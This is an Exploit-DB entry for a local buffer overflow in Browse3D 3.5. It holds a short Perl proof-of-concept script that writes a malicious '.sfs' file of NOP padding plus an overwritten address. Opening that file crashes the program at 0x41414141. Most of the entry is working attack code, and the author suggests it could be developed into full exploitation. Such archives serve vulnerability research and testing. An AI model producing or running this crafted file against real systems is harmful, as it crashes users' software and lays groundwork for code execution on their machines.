Browse3D 3.5 - '.sfs' Local Buffer Overflow (PoC)
Author: Houssamix
type: dos
platform: windows
port:
date_added: 2009-01-10
date_updated: 2017-01-23
verified: 1
codes: OSVDB-51272
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comBrowse3Dsetup.exe
#!/usr/bin/perl -w
# -- Viva Gazza -- Viva Palestine --
# Browse3D v3.5 (.sfs) File Local Buffer overflow PoC
# http://www.browse3d.com/downloads/Browse3Dsetup.exe
# Author : Houssamix
# create file exploit > open it >
# Error : Access violation at 0x41414141 ( tried to read from 0x41414141 ), program terminated.
# we can't run this program under the debugger !!! any way i think it's can be exploited . good luck !
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Browse3D v3.5 Local Buffer overflow PoC \n";
print "===================================================================== \n";
my $adresse = "AAAA" ;
my $nop = "\x90" x 261;
my $file = "Houssamix.sfs";
$exploit = $nop.$adresse;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created open it with Browse3D v 3.5\n";
# milw0rm.com [2009-01-11]